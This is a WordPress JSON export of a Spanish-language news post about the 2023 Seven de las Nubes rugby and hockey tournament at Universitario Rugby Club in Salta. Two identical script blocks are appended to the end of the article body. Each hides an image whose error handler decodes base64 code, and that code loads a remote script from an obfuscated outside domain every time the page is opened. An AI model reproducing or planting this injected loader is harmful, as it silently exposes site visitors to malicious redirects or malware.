{"id":3371,"date":"2023-11-30T11:18:03","date_gmt":"2023-11-30T14:18:03","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3371"},"modified":"2025-08-14T00:04:20","modified_gmt":"2025-08-14T03:04:20","slug":"se-realizara-una-nueva-edicion-del-tradicional-seven-de-las-nubes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3371","title":{"rendered":"Se realizar\u00e1 una nueva edici\u00f3n del tradicional Seven de las Nubes"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#a10a4e\"><em>La competencia se realizar\u00e1 este s\u00e1bado en el predio de Universitario Rugby Club con la participaci\u00f3n de clubes locales y nacionales.<\/em><\/h3>\n\n\n\n<p>Como ya es tradici\u00f3n en Salta desde hace m\u00e1s de veinte a\u00f1os, este s\u00e1bado 9 de diciembre dar\u00e1 inicio la XXIII Edici\u00f3n del Seven de las Nubes organizado por Universitario Rugby Club en sus instalaciones de El Huaico. Estar\u00e1n en juego la Copa de Oro \u00abBanco Macro\u00bb, la Copa de Plata \u00abSportgraff Indumentaria\u00bb y la Copa de Bronce \u00abUcasal\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10018-se-realizara-una-nueva-edicion-del-tradicional-seven-de-las-nubes.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10018-se-realizara-una-nueva-edicion-del-tradicional-seven-de-las-nubes.jpg\" alt=\"Se realizar\u00e1 una nueva edici\u00f3n del tradicional Seven de las Nubes\"\/><\/a><\/figure>\n\n\n\n<p>La competencia modalidad seven m\u00e1s importante del noroeste argentino en rugby y hockey contar\u00e1 con la participaci\u00f3n de clubes locales y nacionales. Asimismo este a\u00f1o la sorpresa ser\u00e1 la participaci\u00f3n especial de Los Pumas 7s.<\/p>\n\n\n\n<p>La presentaci\u00f3n oficial del Seven de las Nubes 2023 se realiz\u00f3 en el sal\u00f3n auditorio de OSDE. En representaci\u00f3n de la Secretar\u00eda de Deportes estuvo presente el subsecretario de Deportes,&nbsp;<strong>Federico Abud<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10019-se-realizara-una-nueva-edicion-del-tradicional-seven-de-las-nubes.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10019-se-realizara-una-nueva-edicion-del-tradicional-seven-de-las-nubes.jpg\" alt=\"Se realizar\u00e1 una nueva edici\u00f3n del tradicional Seven de las Nubes\"\/><\/a><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de prensa y difusi\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La competencia se realizar\u00e1 este s\u00e1bado en el predio de Universitario Rugby Club con la participaci\u00f3n de clubes locales y nacionales. Como ya es tradici\u00f3n en Salta desde hace m\u00e1s de veinte a\u00f1os, este s\u00e1bado 9 de diciembre dar\u00e1 inicio la XXIII Edici\u00f3n del Seven de las Nubes organizado por Universitario Rugby Club en sus [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3372,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,15],"tags":[],"class_list":{"0":"post-3371","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3371"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3371"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3371\/revisions"}],"predecessor-version":[{"id":6905,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3371\/revisions\/6905"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3372"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3371"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3371"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3371"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}